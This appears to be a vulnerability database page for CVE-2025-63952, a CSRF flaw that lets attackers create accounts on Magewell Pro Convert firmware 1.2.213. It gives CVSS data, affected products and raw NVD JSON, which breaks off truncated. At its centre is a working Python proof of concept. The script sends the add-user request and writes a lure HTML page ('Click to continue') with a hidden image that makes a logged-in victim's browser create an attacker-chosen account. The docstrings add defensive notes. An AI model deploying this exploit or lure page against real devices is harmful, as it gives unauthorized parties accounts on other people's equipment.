Security Vulnerability Report
CVE-2025-63952 CVSS 5.7 MEDIUM

CVE-2025-63952

Published: 2025-11-24 17:16:09
Last Modified: 2025-12-30 18:13:43

Description

A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

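Configurations (Affected Products)

Each firmware entry (cpe:2.3:o, VULNERABLE) is paired with the hardware it runs on (cpe:2.3:h). The hardware entry is marked NOT VULNERABLE because the flaw is in the firmware, so read each pair as "firmware 1.2.213 running on this device is affected". The list below is partial: the raw JSON further down names additional models, for example pro_convert_sdi_plus and pro_convert_sdi_tx.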

cpe:2.3:o:magewell:pro_convert_hdmi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:pro_convert_hdmi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:pro_convert_hdmi_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:pro_convert_hdmi_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:pro_convert_hdmi_tx_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:pro_convert_hdmi_tx:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:pro_convert_12g_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:pro_convert_12g_sdi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:pro_convert_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:pro_convert_sdi_4k_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
Magewell Pro Convert v1.2.213

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
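import requests
import argparse


def exploit_csrf(target_url, username, password):
    """Send the CVE-2025-63952 add-user request directly to the device.

    CVE-2025-63952 PoC - Magewell Pro Convert CSRF Account Creation

    Description:
        /mwapi?method=add-user accepts a state-changing GET request and
        lacks proper CSRF token validation.

    This function issues the request from the tester's own host with no
    session cookie attached. It therefore shows only how the endpoint
    answers a bare request; it does not reproduce the CSRF condition,
    which needs the request to be made by a browser that already holds
    an authenticated session. Whether an account was created has to be
    confirmed on the device itself.

    Usage:
        python exploit.py -t http://target.com -u newuser -p newpass

    Args:
        target_url: Base URL of the device, without a trailing slash.
        username: Account name placed in the ``username`` parameter.
        password: Value placed in the ``password`` parameter. It travels
            in the query string, so it can end up in proxy logs and
            browser history; use a throwaway value.

    Returns:
        None. Progress and the truncated response are printed.
    """
    # Query parameters named in the CVE description; requests URL-encodes them.
    params = {
        'method': 'add-user',
        'username': username,
        'password': password
    }

    # Target endpoint
    endpoint = f"{target_url}/mwapi"

    print(f"[*] Targeting: {endpoint}")
    print(f"[*] Attempting to create user: {username}")

    try:
        response = requests.get(endpoint, params=params, timeout=10)

        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:200]}")

        if response.status_code == 200:
            # A 200 from a session-less request proves only that the endpoint
            # answered, so the message no longer claims a finding.
            print("[*] HTTP 200 received - this alone does not confirm CSRF; "
                  "check the device's user list")
        else:
            print("[-] Request failed")

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


def generate_malicious_html(target_url, username, password):
    """Write csrf_exploit.html, a page that triggers the add-user GET.

    The page embeds the add-user URL as an image source, so a browser that
    loads it sends the request together with whatever session it holds for
    the device. That is the CSRF condition described by the CVE.

    What this tells a defender: any cross-origin GET reaches the handler,
    so the fix belongs on the device (a per-session token checked on
    add-user, and no state change on GET). Until firmware is updated, keep
    the management interface off networks where administrators browse,
    and, where request logs or a proxy in front of the device exist, look
    for /mwapi?method=add-user requests with a foreign Referer.

    Args:
        target_url: Base URL of the device, without a trailing slash.
        username: Account name placed in the URL.
        password: Password placed in the URL.

    Returns:
        None. The file is written to the current working directory.
    """
    # NOTE(review): the three values are inserted verbatim, with no URL or
    # HTML encoding; the output is a fixture, not a general-purpose generator.
    html = f'''
<html>
<body>
<h1>Click to continue</h1>
<img src="{target_url}/mwapi?method=add-user&username={username}&password={password}" width="1" height="1">
</body>
</html>
'''

    # Explicit encoding so the file does not depend on the platform default.
    with open('csrf_exploit.html', 'w', encoding='utf-8') as f:
        f.write(html)
    print("[+] Malicious HTML saved as csrf_exploit.html")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-63952 CSRF Exploit')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Username to create')
    parser.add_argument('-p', '--password', required=True, help='Password for new user')

    args = parser.parse_args()

    exploit_csrf(args.target, args.username, args.password)
    generate_malicious_html(args.target, args.username, args.password)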

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63952", "sourceIdentifier": "[email protected]", "published": "2025-11-24T17:16:08.517", "lastModified": "2025-12-30T18:13:43.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) in the /mwapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "F79FF420-5C76-4415-A328-14F36A3F0580"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "ADB1A789-DE46-4A78-847E-B057F1C19BFC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "0A482F2C-BA10-486C-B269-C54B7E40A812"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"7F28BCEE-DFCA-4DA3-B230-159FF9B2E322"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_hdmi_tx_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "AF735287-5754-463D-93DF-2CB50471369E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_hdmi_tx:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3D4371C-A483-4CBD-97F6-7D2A39D6D5E6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_12g_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "F8942E00-D02E-4C6C-BB26-3023D465DDB2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_12g_sdi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "4E95CD31-4ADF-4C08-B19C-6B7117518DB0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_sdi_4k_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "C1CA819A-C9B9-4669-9EC6-73FC73C6EAAC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_4k_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "D7133B02-9693-45A4-89ED-C50D8F35109A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_sdi_plus_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "7FB96455-7250-4B55-A0B8-1D58E9272DB6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "2732B092-46DA-4B25-88BA-7B477C2AE68E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:magewell:pro_convert_sdi_tx_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "75D0133C-74C7-49DA-AE0F-15340CADA7EB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_sdi_tx:-:*:*:*:*:*:*:*", "matchCriteriaId": "732B335F-7445-4DA0-9166-25EC0E5DF4D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_for_ndi_to_hdmi_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "6BB7B1AD-2166-45BA-8B58-98F0505E0BB2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:pro_convert_for_ndi_to_hdmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "1F6715AC-5191-44DF-BE9C-B043187B4769"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:pro_convert_for_ndi_to_hdmi_4k_firmware:1.2.213:*:*:*:*:*:*:*", "matchCriteriaId": "C1E88CDE-7 ... (truncated)